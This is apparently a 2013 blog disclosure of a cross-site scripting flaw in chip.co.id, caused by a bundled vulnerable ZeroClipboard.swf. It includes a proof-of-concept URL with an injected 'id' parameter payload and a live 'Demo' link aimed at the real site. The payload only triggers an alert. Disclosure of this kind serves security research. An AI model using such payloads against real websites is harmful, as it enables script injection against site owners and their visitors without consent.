chip.co.id <== XSS

##################################################
# Description : chip.co.id <== XSS
# Version : -
# Date : 7/8/2013
# Author : Ryuzaki Lawlet / Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)
##################################################

About:
Media IT Indonesia yang selalu konsisten menyajikan infomasi tentang : Teknologi,
Sosial Media Digital, Anti Virus, Game, Software, Hardware Review dan Hardware terkini

Vulnerabilities in the chip.co.id website,
which can be exploited by malicious people to conduct cross-site scripting attacks.
The vulnerabilities are caused due to a bundled vulnerable version of ZeroClipboard.
Cross-Site Scripting vulnerabilities in ZeroClipboard(http://seclists.org/fulldisclosure/2013/Feb/103)
and in multiple web applications.

Affected vendors / author:
http://chip.co.id

Details:
Cross-Site Scripting (WASC-08):
XSS via id parameter and XSS via copying payload into clipboard

POC:
http://site/public/document/copyclipboard/zeroclipboard/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(/XSS/)//&width&height

Demo:
http://chip.co.id/public/document/copyclipboard/zeroclipboard/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(/XSS/)//&width&height

Provided and/or discovered by:
Ryuzaki Lawlet / Fahmi Fisal @justryuz

Pages

chip.co.id <== XSS

Belum ada tanggapan untuk "chip.co.id <== XSS"

Post a Comment

chip.co.id <== XSS

Postingan terkait:

Belum ada tanggapan untuk "chip.co.id <== XSS"

Post a Comment